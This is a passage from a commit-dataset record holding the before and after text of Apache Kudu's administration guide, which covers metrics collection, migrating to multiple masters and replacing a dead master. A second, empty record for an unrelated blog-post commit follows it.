\"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Collecting metrics to a log\n\nKudu may be configured to periodically dump all of its metrics to a local log file using the\n`--metrics_log_interval_ms` flag. Set this flag to the interval at which metrics should be written\nto a log file.\n\nThe metrics log will be written to the same directory as the other Kudu log files, with the same\nnaming format. After any metrics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nThe log file generated has three space-separated fields. The first field is the word\n`metrics`. The second field is the current timestamp in microseconds since the Unix epoch.\nThe third is the current value of all metrics on the server, using a compact JSON encoding.\nThe encoding is the same as the metrics fetched via HTTP described above.\n\nWARNING: Although metrics logging automatically rolls and compresses previous log files, it does\nnot remove old ones. Since metrics logging can use significant amounts of disk space,\nconsider setting up a system utility to monitor space in the log directory and archive or\ndelete old segments.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration.\n\nWARNING: The workflow is unsafe for adding new masters to an existing multi-master configuration.\nDo not use it for that purpose.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommendeded; they can tolerate one or two failures respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameter. Please note if you've set fs_data_dirs to some directories\n other than the value of fs_wal_dir, it should be explicitly included in every command below where\n fs_wal_dir is also included.\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases it is not possible to recover from permanent master failures, and as\nsuch it is highly recommended.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. The master generates very little load so it can be\n colocated with other data services or load-generating processes, though not with another Kudu\n master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc).\n\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir>\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_data_dir> <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Modify the value of the `master_addresses` configuration parameter for both existing master and new masters.\n The new value must be a comma-separated list of all of the masters. Each entry is a string of the form `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master and must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start all of the tablet servers.\n\nCongratulations, the cluster has now been migrated to multiple masters! To verify that all masters\nare working properly, consider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a brief one as masters generally restart quickly.\n\nWARNING: Kudu does not yet support Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases. See the\n<<migrate_to_multi_master,multi-master migration workflow>> for more details.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. Ensure that the dead master is well and truly dead. Take whatever steps needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load so it can be colocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration. The rest of this workflow will refer to\n this master as the \"replacement\" master.\n\n. Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameter. Please note if you've set fs_data_dirs to some directories\n other than the value of fs_wal_dir, it should be explicitly included in every command below where\n fs_wal_dir is also included.\n* Identify and record the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameter. Please note if you've set fs_data_dirs to some directories\n other than the value of fs_wal_dir, it should be explicitly included in every command below where\n fs_wal_dir is also included.\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_data_dir> <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. Use the following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir> --uuid=<uuid>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master --uuid=80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <reference_master>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master and must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Reconfigure the DNS alias for the dead master to point at the replacement master.\n\n. Start the replacement master.\n\n. Restart the existing live masters. This results in a brief availability outage, but it should\n last only as long as it takes for the masters to come back up.\n\nCongratulations, the dead master has been replaced! To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n","old_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\nNOTE: Kudu is easier to manage with link:http:\/\/www.cloudera.com\/content\/www\/en-us\/products\/cloudera-manager.html[Cloudera Manager]\nthan in a standalone installation. See Cloudera's\nlink:http:\/\/www.cloudera.com\/content\/www\/en-us\/documentation\/betas\/kudu\/latest\/topics\/kudu_installation.html[Kudu documentation]\nfor more details about using Kudu with Cloudera Manager.\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. `rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface,\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their host names, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - include the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": \"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Collecting metrics to a log\n\nKudu may be configured to periodically dump all of its metrics to a local log file using the\n`--metrics_log_interval_ms` flag. Set this flag to the interval at which metrics should be written\nto a log file.\n\nThe metrics log will be written to the same directory as the other Kudu log files, with the same\nnaming format. After any metrics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nThe log file generated has three space-separated fields. The first field is the word\n`metrics`. The second field is the current timestamp in microseconds since the Unix epoch.\nThe third is the current value of all metrics on the server, using a compact JSON encoding.\nThe encoding is the same as the metrics fetched via HTTP described above.\n\nWARNING: Although metrics logging automatically rolls and compresses previous log files, it does\nnot remove old ones. Since metrics logging can use significant amounts of disk space,\nconsider setting up a system utility to monitor space in the log directory and archive or\ndelete old segments.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration.\n\nWARNING: The workflow is unsafe for adding new masters to an existing multi-master configuration.\nDo not use it for that purpose.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommendeded; they can tolerate one or two failures respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir`\n configuration parameter.\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases it is not possible to recover from permanent master failures, and as\nsuch it is highly recommended.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. The master generates very little load so it can be\n colocated with other data services or load-generating processes, though not with another Kudu\n master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc).\n\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir>\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_data_dir> <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master and must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start all of the tablet servers.\n\nCongratulations, the cluster has now been migrated to multiple masters! To verify that all masters\nare working properly, consider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a brief one as masters generally restart quickly.\n\nWARNING: Kudu does not yet support Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases. See the\n<<migrate_to_multi_master,multi-master migration workflow>> for more details.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. Ensure that the dead master is well and truly dead. Take whatever steps needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load so it can be colocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration. The rest of this workflow will refer to\n this master as the \"replacement\" master.\n\n. Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir`\n configuration parameter.\n* Identify and record the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir`\n configuration parameter.\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_data_dir> <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. Use the following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir> --uuid=<uuid>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master --uuid=80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <reference_master>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master and must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Reconfigure the DNS alias for the dead master to point at the replacement master.\n\n. Start the replacement master.\n\n. Restart the existing live masters. This results in a brief availability outage, but it should\n last only as long as it takes for the masters to come back up.\n\nCongratulations, the dead master has been replaced! To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1278297d93fd82017e573cb119e3745231b55978","subject":"Update 2015-10-11-MapReduce-Tutorial.adoc","message":"Update 2015-10-11-MapReduce-Tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 